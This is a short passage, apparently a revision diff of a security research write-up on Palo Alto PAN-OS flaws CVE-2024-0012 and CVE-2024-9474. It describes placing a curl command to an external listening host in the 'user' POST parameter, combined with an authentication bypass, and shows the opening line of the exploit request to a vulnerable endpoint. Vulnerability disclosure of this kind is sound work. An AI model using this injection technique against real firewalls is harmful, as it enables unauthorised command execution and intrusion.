Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474

 Our theory was simple - the value being passed via the 'user' parameter was likely going into $_SESSION['userName'] that as we saw above was the source of what looked like a patch for a command injection vulnerability.

-Fret not - we decided to proceed and created a username containing a simple curl command to our external listening host:
+Fret not - we decided to proceed and created a valid HTTP request, using our aforementioned auth bypass, and an HTTP post parameter value for the 'user' key containing a simple curl command to our external listening host:

 POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1